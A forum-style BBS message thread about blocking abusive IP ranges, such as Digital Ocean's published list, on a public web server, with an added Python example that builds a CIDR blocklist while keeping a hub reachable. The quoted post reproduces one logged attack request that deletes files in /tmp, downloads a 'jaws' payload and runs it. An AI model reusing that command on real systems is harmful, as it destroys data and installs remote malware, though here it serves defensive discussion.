Subj : Re: IP Block Lists
To   : Warpslide
From : MeaTLoTioN
Date : Sat Mar 19 2022 10:43:10

On 18 Mar 2022, Warpslide said the following...

Wa> Hi All,
Wa>
Wa> I have a web server accessible to the public, which as expected was
Wa> getting hammered with various bots & script kiddies.
Wa>
Wa> I've set up an IP blocklist for the usual suspects, but I was noticing a
Wa> lot of malicious traffic from California, Germany, The Netherlands & the
Wa> UK as well.
Wa>
Wa> Not wanting to block those countries out entirely I decided to dig a
Wa> little deeper and noticed that many of these addresses had one thing in
Wa> common: They're coming from Digital Ocean.
Wa>
Wa> Most of these seem to be trying to log into WordPress or bring up other
Wa> login pages for other services that don't exist on this web server.
Wa> Others seem to be a little more insidious:
Wa>
Wa> "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws
Wa> HTTP/1.1"
Wa>
Wa> None of these work or do anything on my webserver, but I still don't
Wa> want them hammering on my system.
Wa>
Wa> Fortunately Digital Ocean publishes a full list of the IP addresses they
Wa> use: https://digitalocean.com/geo/google.csv
Wa>
Wa> After adding these ranges to my blocklist suddenly my Apache logs are a
Wa> lot quieter.
Wa>
Wa> Do you filter by country/region or by provider? If so, which IP ranges
Wa> do you block?
Wa>
Wa> p.s: I know some BBS hubs are located on VPS providers, you may need to
Wa> modify these lists if you want to use them so you can still communicate
Wa> with your hub if they happen to use Digital Ocean. ML looks like he
Wa> uses OVH so he's safe... ;)

Good info, I use OVH yes for the UK and CA hubs.

I made a publicly available blacklist of IPs for Mystic BBSes along with a
sort of door/script thing to automagically grab, compare and add new IPs to
your local list (Mystic only so far).

The main blacklist can be found here;

  $ curl https://erb.pw/blacklist

If you want to use my door/script, you can get it here;

  https://github.com/christiansacks/mystic-twitupd

Hope this helps out people =)

---
Best regards,
Christian aka MeaTLoTioN

[eml] ml@erb.pw     [web] www.erb.pw
[fsx] 21:1/158      [tqw] 1337:1/101
[rtn] 80:774/81     [fdn] 2:250/5
[ark] 10:104/2

... Reward for a job well done: More work
--- Mystic BBS v1.12 A47 2021/12/13 (Linux/64)
 * Origin: thE qUAntUm wOrmhOlE, rAmsgAtE, uK. bbs.erb.pw (1337:1/101)
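
Added example (not part of the messages above, and not the mystic-twitupd script): one way to turn a provider's published range CSV into a blocklist while leaving a hub on that provider reachable, as the quoted p.s. suggests. It assumes the network prefix is the first CSV column; the sample rows and hub addresses are constructed from documentation ranges, and all function names are hypothetical.

```python
import csv
import io
import ipaddress

# Constructed sample; assumed layout: prefix first, location fields after it.
SAMPLE_CSV = """\
198.51.100.0/25,US,US-CA,San Francisco,94124
198.51.100.128/25,US,US-CA,San Francisco,94124
203.0.113.0/24,DE,DE-HE,Frankfurt,60341
2001:db8:10::/48,NL,NL-NH,Amsterdam,1098
not-a-prefix,GB,GB-ENG,London,
"""

# Hypothetical hub addresses that must stay reachable.
HUB_ALLOWLIST = ["203.0.113.77", "2001:db8:10:5::1"]

def load_prefixes(text):
    """Return the valid networks from the CSV, skipping empty or bad rows."""
    nets = []
    for row in csv.reader(io.StringIO(text)):
        try:
            nets.append(ipaddress.ip_network(row[0].strip(), strict=False))
        except (ValueError, IndexError):
            continue  # malformed input never becomes a block rule
    return nets

def carve_out(nets, allow):
    """Remove each allowlisted address from whichever network contains it."""
    for addr in map(ipaddress.ip_address, allow):
        hole = ipaddress.ip_network(addr)  # single host: /32 or /128
        result = []
        for net in nets:
            if net.version != hole.version or not hole.subnet_of(net):
                result.append(net)  # unrelated range, keep as is
            elif hole != net:
                result.extend(net.address_exclude(hole))  # range minus the hub
        nets = result
    return nets

def build_blocklist(text, allow):
    """Carve out the allowlist, then merge adjacent ranges per IP version."""
    nets = carve_out(load_prefixes(text), allow)
    out = []
    for version in (4, 6):
        out += ipaddress.collapse_addresses(n for n in nets if n.version == version)
    return [str(n) for n in out]

if __name__ == "__main__":
    print("\n".join(build_blocklist(SAMPLE_CSV, HUB_ALLOWLIST)))
```

The output is a list of CIDR strings that can be fed to whatever the blocklist lives in; re-run it whenever the provider's list or the hub addresses change.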